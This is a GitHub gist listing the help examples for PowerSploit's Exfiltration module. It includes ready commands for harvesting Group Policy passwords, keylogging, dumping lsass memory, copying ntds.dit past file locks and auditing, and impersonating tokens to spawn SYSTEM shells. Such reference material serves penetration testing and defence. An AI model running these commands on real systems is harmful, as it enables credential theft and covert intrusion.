Last active
August 16, 2016 10:27
-
-
Save carnal0wnage/73ccc44c5b8fc5c53fcb to your computer and use it in GitHub Desktop.
PowerSploit Exfiltration Examples Documentation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Command -Module Exfiltration | |
CommandType Name ModuleName | |
----------- ---- ---------- | |
Function Get-GPPPassword Exfiltration | |
Function Get-Keystrokes Exfiltration | |
Function Get-TimedScreenshot Exfiltration | |
Function Get-VaultCredential Exfiltration | |
Function Get-VolumeShadowCopy Exfiltration | |
Function Invoke-CredentialInjection Exfiltration | |
Function Invoke-NinjaCopy Exfiltration | |
Function Invoke-TokenManipulation Exfiltration | |
Function Mount-VolumeShadowCopy Exfiltration | |
Function Out-Minidump Exfiltration | |
----------- | |
Get-GPPPassword | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-GPPPassword -examples | |
NAME | |
Get-GPPPassword | |
SYNOPSIS | |
Retrieves the plaintext password and other information for accounts pushed | |
through Group Policy Preferences. | |
PowerSploit Function: Get-GPPPassword | |
Author: Chris Campbell (@obscuresec) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
Version: 2.4.2 | |
-------------------------- EXAMPLE 1 -------------------------- | |
PS C:\>Get-GPPPassword | |
NewName : [BLANK] | |
Changed : {2014-02-21 05:28:53} | |
Passwords : {password12} | |
UserNames : {test1} | |
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00 | |
C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml | |
NewName : {mspresenters} | |
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} | |
Passwords : {Recycling*3ftw!, password123, password1234} | |
UserNames : {Administrator (built-in), DummyAccount, dummy2} | |
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00 | |
C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml | |
NewName : [BLANK] | |
Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} | |
Passwords : {password, password1234$} | |
UserNames : {administrator, admin} | |
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00 | |
C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml | |
NewName : [BLANK] | |
Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} | |
Passwords : {password, read123} | |
UserNames : {DEMO\Administrator, admin} | |
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00 | |
C04FB984F9}\MACHINE\Preferences\Services\Services.xml | |
-------------------------- EXAMPLE 2 -------------------------- | |
PS C:\>Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq | |
password | |
password12 | |
password123 | |
password1234 | |
password1234$ | |
read123 | |
Recycling*3ftw! | |
----- | |
Get-Keystrokes | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-Keystrokes -examples | |
NAME | |
Get-Keystrokes | |
SYNOPSIS | |
Logs keys pressed, time and the active window. | |
PowerSploit Function: Get-Keystrokes | |
Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
-------------------------- EXAMPLE 1 -------------------------- | |
C:\PS>Get-Keystrokes -LogPath C:\key.log | |
-------------------------- EXAMPLE 2 -------------------------- | |
C:\PS>Get-Keystrokes -CollectionInterval 20 | |
----- | |
Get-TimedScreenshot | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-TimedScreenshot -examples | |
NAME | |
Get-TimedScreenshot | |
SYNOPSIS | |
Takes screenshots at a regular interval and saves them to disk. | |
PowerSploit Function: Get-TimedScreenshot | |
Author: Chris Campbell (@obscuresec) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
-------------------------- EXAMPLE 1 -------------------------- | |
PS C:\>Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00 | |
----- | |
Get-VaultCredential | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-VaultCredential -examples | |
NAME | |
Get-VaultCredential | |
SYNOPSIS | |
Displays Windows vault credential objects including cleartext web | |
credentials. | |
PowerSploit Function: Get-VaultCredential | |
Author: Matthew Graeber (@mattifestation) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
-------------------------- EXAMPLE 1 -------------------------- | |
C:\PS>Get-VaultCredential | |
----- | |
Get-VolumeShadowCopy | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Get-VolumeShadowCopy -examples | |
NAME | |
Get-VolumeShadowCopy | |
SYNOPSIS | |
Lists the device paths of all local volume shadow copies. | |
PowerSploit Function: Get-VolumeShadowCopy | |
Author: Matthew Graeber (@mattifestation) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
Version: 2.0.0 | |
----- | |
Invoke-CredentialInjection | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-CredentialInjection -examples | |
NAME | |
Invoke-CredentialInjection | |
SYNOPSIS | |
This script allows an attacker to create logons with clear-text | |
credentials without triggering a suspicious Event ID 4648 (Explicit | |
Credential Logon). | |
The script either creates a suspended winlogon.exe process running as | |
SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL in to | |
winlogon.exe which calls LsaLogonUser to create a logon from within | |
winlogon.exe (which is where it is called from when a user logs in using | |
RDP or | |
logs on locally). The injected DLL then impersonates the new logon token | |
with its current thread so that it can be kidnapped using | |
Invoke-TokenManipulation. | |
PowerSploit Function: Invoke-CredentialInjection | |
Author: Joe Bialek, Twitter: @JosephBialek | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
Version: 1.1 | |
-------------------------- EXAMPLE 1 -------------------------- | |
C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName | |
"administrator" -Password "Password1" -NewWinLogon | |
Creates a new winlogon process (as the SYSTEM account) and creates a logon | |
from within the process as demo\administrator. The logon will default to | |
RemoteInteractive (an RDP logon). Defaults to using the Kerberos provider. | |
-------------------------- EXAMPLE 2 -------------------------- | |
C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName | |
"administrator" -Password "Password1" -ExistingWinLogon -LogonType | |
NetworkCleartext | |
Uses an existing winlogon process and creates a loogn from within it as | |
demo\administrator. The logon will be type NetworkCleartext (used in basic | |
auth | |
and PowerShell w/ CredSSP). Defaults to using the Kerberos provider. | |
-------------------------- EXAMPLE 3 -------------------------- | |
C:\PS>Invoke-CredentialInjection -DomainName "demo" -UserName | |
"administrator" -Password "Password1" -NewWinLogon -AuthPackage Msv1_0 | |
Creates a new winlogon process (as the SYSTEM account) and creates a logon | |
from within the process as demo\administrator. The logon will default to | |
RemoteInteractive (and RDP logon). The logon will use the Msv1_0 auth | |
package (NTLM). | |
----- | |
Invoke-NinjaCopy | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-NinjaCopy -examples | |
NAME | |
Invoke-NinjaCopy | |
SYNOPSIS | |
This script can copy files off an NTFS volume by opening a read handle to | |
the entire volume (such as c:) and parsing the NTFS structures. This | |
requires you | |
are an administrator of the server. This allows you to bypass the | |
following protections: | |
1. Files which are opened by a process and cannot be opened by other | |
processes, such as the NTDS.dit file or SYSTEM registry hives | |
2. SACL flag set on a file to alert when the file is opened (I'm not | |
using a Win32 API to open the file, so Windows has no clue) | |
3. Bypass DACL's, such as a DACL which only allows SYSTEM to open a | |
file | |
If the LocalDestination param is specified, the file will be copied to the | |
file path specified on the local server (the server the script is being | |
run from). | |
If the RemoteDestination param is specified, the file will be copied to | |
the file path specified on the remote server. | |
The script works by opening a read handle to the volume (which if logged, | |
may stand out, but I don't think most people log this and other processes | |
do it too). | |
The script then uses NTFS parsing code written by cyb70289 and posted to | |
CodePlex to parse the NTFS structures. Since the NTFS parsing code is | |
written | |
in C++, I have compiled the code to a DLL and load it reflective in to | |
PowerShell using the Invoke-ReflectivePEInjection.ps1 script (see below | |
for a link | |
to the original script). | |
Script: Invoke-NinjaCopy.ps1 | |
Author: Joe Bialek, Twitter: @JosephBialek | |
Contributors: This script has a byte array hardcoded, which contains a DLL | |
wich parses NTFS. This NTFS parsing code was written by cyb70289 | |
<cyb70289@gmail.com> | |
See the following link: | |
http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib | |
The source code is also available with the | |
distribution of this script. | |
License: GPLv3 or later | |
Required Dependencies: None | |
Optional Dependencies: None | |
Version: 1.1 | |
ReflectivePEInjection version: 1.1 | |
-------------------------- EXAMPLE 1 -------------------------- | |
C:\PS>Read the file ntds.dit from a remote server and write it to | |
c:\test\ntds.dit on the local server | |
$NtdsBytes = Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" | |
-ComputerName "Server1" -LocalDestination "c:\test\ntds.dit" | |
-------------------------- EXAMPLE 2 -------------------------- | |
C:\PS>Read the file ntds.dit from a remote server and copy it to the temp | |
directory on the remote server. | |
Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -RemoteDestination | |
"c:\windows\temp\ntds.dit" -ComputerName "Server1" | |
-------------------------- EXAMPLE 3 -------------------------- | |
C:\PS>Read the file ntds.dit from the local server and copy it to the temp | |
directory on the local server. | |
Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination | |
"c:\windows\temp\ntds.dit" | |
----- | |
Invoke-TokenManipulation | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Invoke-TokenManipulation -examples | |
NAME | |
Invoke-TokenManipulation | |
SYNOPSIS | |
This script requires Administrator privileges. It can enumerate the Logon | |
Tokens available and use them to create new processes. This allows you to | |
use another user's credentials over the network by creating a process with | |
their logon token. This will work even with Windows 8.1 LSASS protections. | |
This functionality is very similar to the incognito tool (with some | |
differences, and different use goals). | |
This script can also make the PowerShell thread impersonate another users | |
Logon Token. Unfortunately this doesn't work well, because PowerShell | |
creates new threads to do things, and those threads will use the Primary | |
token of the PowerShell process (your original token) and not the token | |
that one thread is impersonating. Because of this, you cannot use thread | |
impersonation to impersonate a user and then use PowerShell remoting to | |
connect to another server as that user (it will authenticate using the primary | |
token of the process, which is your original logon token). | |
Because of this limitation, the recommended way to use this script is to | |
use CreateProcess to create a new PowerShell process with another users | |
Logon Token, and then use this process to pivot. This works because the entire | |
process is created using the other users Logon Token, so it will use their | |
credentials for the authentication. | |
IMPORTANT: If you are creating a process, by default this script will | |
modify the ACL of the current users desktop to allow full control to | |
"Everyone". | |
This is done so that the UI of the process is shown. If you do not need | |
the UI, use the -NoUI flag to prevent the ACL from being modified. This ACL | |
is not permanent, as in, when the current logs off the ACL is cleared. It | |
is still preferable to not modify things unless they need to be modified | |
though, so I created the NoUI flag. ALSO: When creating a process, the script will | |
request SeSecurityPrivilege so it can enumerate and modify the ACL of the | |
desktop. | |
This could show up in logs depending on the level of monitoring. | |
PERMISSIONS REQUIRED: | |
SeSecurityPrivilege: Needed if launching a process with a UI that needs to | |
be rendered. Using the -NoUI flag blocks this. | |
SeAssignPrimaryTokenPrivilege : Needed if launching a process while the | |
script is running in Session 0. | |
Important differences from incognito: | |
First of all, you should probably read the incognito white paper to | |
understand what incognito does. If you use incognito, you'll notice it | |
differentiates between "Impersonation" and "Delegation" tokens. This is because incognito | |
can be used in situations where you get remote code execution against a | |
service which has threads impersonating multiple users. Incognito can enumerate | |
all tokens available to the service process, and impersonate them (which | |
might allow you to elevate privileges). This script must be run as administrator, and | |
because you are already an administrator, the primary use of this script | |
is for pivoting without dumping credentials. | |
In this situation, Impersonation vs Delegation does not matter because an | |
administrator can turn any token in to a primary token (delegation | |
rights). What does matter is the logon type used to create the logon token. If a user | |
connects using Network Logon (aka type 3 logon), the computer will not | |
have any credentials for the user. Since the computer has no credentials associated with the token, | |
it will not be possible to authenticate off-box with the token. All other | |
logon types should have credentials associated with them (such as Interactive logon, | |
Service logon, Remote interactive logon, etc). Therefore, this script looks | |
for tokens which were created with desirable logon tokens (and only | |
displays them by default). | |
In a nutshell, instead of worrying about "delegation vs impersonation" | |
tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon | |
(good). | |
PowerSploit Function: Invoke-TokenManipulation | |
Author: Joe Bialek, Twitter: @JosephBialek | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
Version: 1.11 | |
(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune | |
Mariboe, https://www.linkedin.com/in/runemariboe) | |
-------------------------- EXAMPLE 1 -------------------------- | |
C:\PS>Invoke-TokenManipulation -Enumerate | |
Lists all unique usable tokens on the computer. | |
-------------------------- EXAMPLE 2 -------------------------- | |
C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt | |
authority\system" | |
Spawns cmd.exe as SYSTEM. | |
-------------------------- EXAMPLE 3 -------------------------- | |
C:\PS>Invoke-TokenManipulation -ImpersonateUser -Username "nt | |
authority\system" | |
Makes the current PowerShell thread impersonate SYSTEM. | |
-------------------------- EXAMPLE 4 -------------------------- | |
C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500 | |
Spawns cmd.exe using the primary token belonging to process ID 500. | |
-------------------------- EXAMPLE 5 -------------------------- | |
C:\PS>Invoke-TokenManipulation -ShowAll | |
Lists all tokens available on the computer, including non-unique tokens | |
and tokens created using NetworkLogon. | |
-------------------------- EXAMPLE 6 -------------------------- | |
C:\PS>Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500 | |
Spawns cmd.exe using the token belonging to thread ID 500. | |
-------------------------- EXAMPLE 7 -------------------------- | |
C:\PS>Get-Process wininit | Invoke-TokenManipulation -CreateProcess | |
"cmd.exe" | |
Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output | |
of Get-Process to the "-Process" parameter of the script. | |
-------------------------- EXAMPLE 8 -------------------------- | |
C:\PS>(Get-Process wininit | Invoke-TokenManipulation -CreateProcess | |
"cmd.exe" -PassThru).WaitForExit() | |
Spawns cmd.exe using the primary token of LSASS.exe. Then holds the | |
spawning PowerShell session until that process has exited. | |
-------------------------- EXAMPLE 9 -------------------------- | |
C:\PS>Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser | |
Makes the current thread impersonate the lsass security token. | |
----- | |
Mount-VolumeShadowCopy | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Mount-VolumeShadowCopy -examples | |
NAME | |
Mount-VolumeShadowCopy | |
SYNOPSIS | |
Mounts a volume shadow copy. | |
PowerSploit Function: Mount-VolumeShadowCopy | |
Author: Matthew Graeber (@mattifestation) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
Version: 2.0.0 | |
-------------------------- EXAMPLE 1 -------------------------- | |
C:\PS>Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path C:\VSS | |
Description | |
----------- | |
Create a mount point in 'C:\VSS' for each volume shadow copy volume | |
-------------------------- EXAMPLE 2 -------------------------- | |
C:\PS>Mount-VolumeShadowCopy -Path C:\VSS -DevicePath | |
'\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4' | |
-------------------------- EXAMPLE 3 -------------------------- | |
C:\PS>Get-WmiObject Win32_ShadowCopy | % { $_.DeviceObject -Path C:\VSS | |
-DevicePath $_ } | |
----- | |
Out-Minidump | |
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Help Out-Minidump -examples | |
NAME | |
Out-Minidump | |
SYNOPSIS | |
Generates a full-memory minidump of a process. | |
PowerSploit Function: Out-Minidump | |
Author: Matthew Graeber (@mattifestation) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
-------------------------- EXAMPLE 1 -------------------------- | |
C:\PS>Out-Minidump -Process (Get-Process -Id 4293) | |
Description | |
----------- | |
Generate a minidump for process ID 4293. | |
-------------------------- EXAMPLE 2 -------------------------- | |
C:\PS>Get-Process lsass | Out-Minidump | |
Description | |
----------- | |
Generate a minidump for the lsass process. Note: To dump lsass, you must be | |
running from an elevated prompt. | |
-------------------------- EXAMPLE 3 -------------------------- | |
C:\PS>Get-Process | Out-Minidump -DumpFilePath C:\temp | |
Description | |
----------- | |
Generate a minidump of all running processes and save them to C:\temp. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment